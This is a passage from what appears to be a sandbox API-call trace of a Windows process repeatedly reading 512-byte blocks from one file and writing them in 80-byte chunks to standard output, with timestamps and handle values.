lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.057] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.057] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.057] GetFileType (hFile=0x50) returned 0x1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.058] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.058] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.058] GetFileType (hFile=0x50) returned 0x1 [0131.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.059] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.059] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.059] GetFileType (hFile=0x50) returned 0x1 [0131.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.060] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.060] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.060] GetFileType (hFile=0x50) returned 0x1 [0131.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.061] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.061] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] GetFileType (hFile=0x50) returned 0x1 [0131.061] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.061] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.062] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.062] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] GetFileType (hFile=0x50) returned 0x1 [0131.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.062] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.063] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.063] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.063] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.064] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.064] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.064] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] GetFileType (hFile=0x50) returned 0x1 [0131.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.065] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 